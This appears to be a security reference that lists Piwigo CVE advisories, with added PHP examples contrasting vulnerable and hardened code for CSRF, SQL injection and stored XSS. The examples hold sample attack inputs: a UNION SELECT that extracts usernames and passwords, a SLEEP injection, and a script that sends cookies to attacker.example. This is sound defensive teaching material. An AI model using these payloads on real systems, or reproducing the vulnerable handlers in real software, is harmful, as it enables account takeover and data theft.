
CVE-2023-33359
https://notcve.org/view.php?id=CVE-2023-33359
23 May 2023 — Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function. • https://github.com/Piwigo/Piwigo/issues/1908 • CWE-352: Cross-Site Request Forgery (CSRF) •
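The CSRF class behind CVE-2023-33359: a state-changing request (here, adding a tag) that is accepted on the strength of the session cookie alone, so any page the logged-in user visits can submit it. The block below is an added example, not Piwigo's own code or its actual fix; the function names, the `csrf_token` field name and the in-memory session and tag arrays are hypothetical stand-ins for a real session store and request.

```php
<?php
// Added example (not Piwigo code): a per-session anti-CSRF token for a
// state-changing "add tag" request. All names here are hypothetical.

// Create the token once per session and reuse it for every form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field to render into the "add tags" form (escaped for HTML).
function csrf_field(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Vulnerable handler: any POST from an authenticated browser is accepted,
// including one auto-submitted by a page on another origin.
function add_tags_vulnerable(array $session, array $post, array &$tags): bool
{
    $tags[] = (string)($post['tag'] ?? '');
    return true;
}

// Hardened handler: the request must carry the session's token. A cross-site
// form cannot read the token, so it cannot forge a valid request.
function add_tags_safe(array $session, array $post, array &$tags): bool
{
    $expected = (string)($session['csrf_token'] ?? '');
    $sent     = (string)($post['csrf_token'] ?? '');
    if ($expected === '' || !hash_equals($expected, $sent)) {
        return false;   // reject; do not fall through to the action
    }
    $tags[] = (string)($post['tag'] ?? '');
    return true;
}

// Constructed scenario: the victim is logged in (session exists and a form
// has already been rendered); attacker.example auto-submits a POST with only
// the tag field, because it has no way to obtain the token.
$session = [];
csrf_field($session);
$tags = [];

$forged_post = ['tag' => 'spam-from-attacker'];
var_dump(add_tags_vulnerable($session, $forged_post, $tags));
var_dump(add_tags_safe($session, $forged_post, $tags));

// A request from the gallery's own form carries the token and is accepted.
$legit_post = ['tag' => 'holiday', 'csrf_token' => csrf_token($session)];
var_dump(add_tags_safe($session, $legit_post, $tags));
```

`hash_equals()` is used for the comparison so token checking does not leak timing information; the token is tied to the session rather than generated per request, which is enough for this pattern and avoids breaking multi-tab use. Setting `SameSite=Lax` or `Strict` on the session cookie is a worthwhile second layer, but it is not a substitute for the token check on GET-reachable or legacy handlers.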

CVE-2023-33361
https://notcve.org/view.php?id=CVE-2023-33361
23 May 2023 — Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php. • https://github.com/Piwigo/Piwigo/issues/1910 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-33362
https://notcve.org/view.php?id=CVE-2023-33362
23 May 2023 — Piwigo 13.6.0 is vulnerable to SQL Injection in the "profile" function. • https://github.com/Piwigo/Piwigo/issues/1911 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-27233
https://notcve.org/view.php?id=CVE-2023-27233
17 May 2023 — Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php. • https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2023-26876 – Piwigo CVE-2023-26876 Gather Credentials via SQL Injection
https://notcve.org/view.php?id=CVE-2023-26876
21 Apr 2023 — An SQL injection vulnerability in Piwigo v13.5.0 and earlier allows a remote attacker to execute arbitrary code via the filter_user_id parameter of the admin.php?page=history&filter_image_id=&filter_user_id endpoint. Packet Storm reports the same issue as a remote SQL injection in Piwigo 13.5.0. • https://packetstorm.news/files/id/172059 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
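The two advisories above describe the two places untrusted input typically reaches SQL in a listing page: a filter value (`filter_user_id`, CVE-2023-26876) that lands in a `WHERE` clause, and a sort direction (`order[0][dir]`, CVE-2023-27233) that lands in `ORDER BY`. They need different fixes, because a bound parameter can only replace a value, never a keyword or identifier. The block below is an added example and not Piwigo's code or its patch; the `history` table, its columns, the `users` table in the payload and the function names are hypothetical.

```php
<?php
// Added example (not Piwigo code). Hypothetical table/column names.
// Shows a filter value and a sort direction reaching SQL unsafely, then the
// hardened form: bind the value, allowlist the keyword and the column.

// --- Vulnerable: both request values are concatenated into SQL text ---------
function history_query_vulnerable(array $get): string
{
    $uid = $get['filter_user_id'] ?? '0';
    $dir = $get['order'][0]['dir'] ?? 'ASC';
    return "SELECT id, user_id, image_id FROM history"
         . " WHERE user_id = $uid ORDER BY id $dir";
}

// --- Hardened: returns [sql, bound params] for PDO::prepare()/execute() -----
function history_query_safe(array $get): array
{
    $sql    = 'SELECT id, user_id, image_id FROM history';
    $params = [];

    // Value position: validate the type, then bind it instead of interpolating.
    $raw_uid = (string)($get['filter_user_id'] ?? '');
    if ($raw_uid !== '') {
        $uid = filter_var($raw_uid, FILTER_VALIDATE_INT);
        if ($uid === false) {
            throw new InvalidArgumentException('filter_user_id must be an integer');
        }
        $sql .= ' WHERE user_id = :uid';
        $params[':uid'] = $uid;
    }

    // Identifier/keyword position: only constants chosen here may appear.
    $columns = ['id' => 'id', 'date' => 'date', 'user' => 'user_id'];
    $col = $columns[(string)($get['order'][0]['column'] ?? 'id')] ?? 'id';
    $dir = strtoupper((string)($get['order'][0]['dir'] ?? 'ASC'));
    if (!in_array($dir, ['ASC', 'DESC'], true)) {
        $dir = 'ASC';   // or reject the request outright
    }
    $sql .= " ORDER BY $col $dir";

    return [$sql, $params];
}

// Constructed request carrying a UNION payload in the filter and a stacked
// expression in the sort direction (the users table name is hypothetical).
$attack = [
    'filter_user_id' => '0 UNION SELECT 1, username, password FROM users',
    'order' => [0 => ['column' => 'id', 'dir' => 'ASC,(SELECT SLEEP(5))']],
];

echo history_query_vulnerable($attack), PHP_EOL;

try {
    history_query_safe($attack);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// A well-formed request: the id is bound, the direction is an allowlisted keyword.
$benign = ['filter_user_id' => '42', 'order' => [0 => ['column' => 'user', 'dir' => 'desc']]];
[$sql, $params] = history_query_safe($benign);
echo $sql, ' ', json_encode($params), PHP_EOL;
```

With the attack request the vulnerable builder emits the attacker's text verbatim inside the statement, while the hardened builder throws on the non-integer filter and, if only the sort direction were hostile, silently falls back to `ASC`. The allowlist is the important part: escaping functions do nothing for `ORDER BY` keywords, and a "column index" from a DataTables-style request should be mapped through a fixed table exactly as `$columns` does here.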

CVE-2022-48007
https://notcve.org/view.php?id=CVE-2022-48007
27 Jan 2023 — A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent header. • https://github.com/Piwigo/Piwigo/issues/1835 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
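The User-Agent header is fully attacker-controlled, and a stored XSS of this shape fires later, in an admin's browser, when the recorded value is rendered into a page. The block below is an added example, not Piwigo's code or fix; the log structure, the `record_login` and `render_log_*` functions and the sample header are all constructed for illustration.

```php
<?php
// Added example (not Piwigo code). A request header is stored raw and later
// rendered to an administrator; the fix is contextual escaping at output time.

// Store the header as received. Sanitising on input is fragile and loses data;
// the defence belongs where the value is turned into HTML.
function record_login(array $server, array &$log): void
{
    $log[] = [
        'user'  => 'guest',
        'agent' => (string)($server['HTTP_USER_AGENT'] ?? ''),
    ];
}

// Vulnerable renderer: stored strings are concatenated straight into markup.
function render_log_vulnerable(array $log): string
{
    $html = '';
    foreach ($log as $row) {
        $html .= '<tr><td>' . $row['user'] . '</td><td>' . $row['agent'] . "</td></tr>\n";
    }
    return $html;
}

// HTML-body/attribute escaping: quotes, angle brackets and ampersands become
// entities; ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened renderer: every untrusted value passes through h() at the point
// where it enters an HTML text or attribute context.
function render_log_safe(array $log): string
{
    $html = '';
    foreach ($log as $row) {
        $html .= '<tr><td>' . h($row['user']) . '</td><td>' . h($row['agent']) . "</td></tr>\n";
    }
    return $html;
}

// Constructed request whose User-Agent carries a cookie-stealing script.
$server = [
    'HTTP_USER_AGENT' => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
];
$log = [];
record_login($server, $log);

echo render_log_vulnerable($log);
echo render_log_safe($log);
```

In the hardened output the payload survives as visible text (`&lt;script&gt;...`) rather than as an element. If the same value were later placed inside a JavaScript string or a URL, `htmlspecialchars` would be the wrong escaper; each output context needs its own. Marking the session cookie `HttpOnly` and shipping a Content-Security-Policy limit what a stored payload can do if an escaping gap is missed, but they do not replace output encoding.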

CVE-2014-125053 – Piwigo-Guest-Book Navigation Bar guestbook.inc.php sql injection
https://notcve.org/view.php?id=CVE-2014-125053
06 Jan 2023 — A vulnerability rated critical was found in Piwigo-Guest-Book up to 1.3.0. It affects unknown code in the file include/guestbook.inc.php of the Navigation Bar component: manipulation of the start argument leads to SQL injection. Upgrading to version 1.3.1 addresses this issue. • https://github.com/Piwigo/Piwigo-Guest-Book/commit/0cdd1c388edf15089c3a7541cefe7756e560581d • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2022-37183
https://notcve.org/view.php?id=CVE-2022-37183
31 Aug 2022 — Piwigo 12.3.0 is vulnerable to Cross Site Scripting (XSS) via /search/1940/created-monthly-list. • https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Piwigo/2022/12.3.0 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •

CVE-2022-32297
https://notcve.org/view.php?id=CVE-2022-32297
14 Jul 2022 — Piwigo v12.2.0 was discovered to contain an SQL injection vulnerability via the Search function; the referenced write-up describes it as a second-order SQL injection. • https://github.com/sth276/research/blob/main/piwigo_vul/Second-Order%20SQL%20Injection%20Vulnerabilities%20in%20Piwigo.md • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •

CVE-2021-40553
https://notcve.org/view.php?id=CVE-2021-40553
28 Jun 2022 — Piwigo 11.5.0 is affected by a remote code execution (RCE) vulnerability in the LocalFiles Editor. • https://github.com/Yang9999999/vuln/blob/main/README.md • CWE-94: Improper Control of Generation of Code ('Code Injection') •